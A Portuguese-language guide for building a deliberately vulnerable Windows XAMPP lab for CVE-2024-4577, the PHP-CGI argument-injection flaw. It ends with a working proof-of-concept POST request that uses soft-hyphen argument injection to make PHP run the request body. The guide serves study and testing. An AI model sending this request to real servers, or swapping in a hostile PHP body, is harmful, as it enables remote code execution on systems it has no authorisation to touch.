
Criar laboratório para CVE-2024-4577
| CVE | Descrição | CVSSv3 |
| CVE-2024-4577 | Vulnerabilidade de Injeção de Argumento PHP-CGI | 9.8 |
"CVE-2024-4577 é uma vulnerabilidade crítica de injeção de argumento no PHP que pode ser explorada para alcançar execução remota de código (RCE). De acordo com pesquisadores da DEVCORE, essa falha é resultado de erros nas conversões de codificação de caracteres, afetando o recurso “Best Fit” no Windows."
-Tenable
Baixe o XAMPP (8.1.25 / PHP 8.1.25) Após instalar o XAMPP, verifique a versão do PHP. Deve ser 8.1.25. A versão do PHP pode ser verificada executando o comando "php -v" a partir da linha de comando. Se der erro, deve ser adicionada à variável de ambiente PATH do PHP.
A localidade precisa ser alterada. Para isso, siga Painel de Controle > Relógio e Região > Região. Defina o formato para Japonês, Chinês Tradicional ou Chinês Simplificado. Clique em Administrativo > Alterar localidade do sistema e selecione a localidade apropriada.
Se o PHP não estiver executando em modo CGI, você deve fazer estas configurações.
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Coloque '#' no início da linha.Salve as alterações e inicie a instância do Apache.
Se a saída do código PHP enviado no corpo da requisição POST abaixo for vista na resposta, a etapa de exploração foi bem-sucedida.
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
Este ambiente de laboratório destina-se exclusivamente a fins educacionais e não deve ser utilizado em ambientes de produção. Não me responsabilizo por quaisquer danos ou perdas que possam ocorrer como resultado do uso inadequado. Os usuários devem utilizar este ambiente por sua própria conta e risco.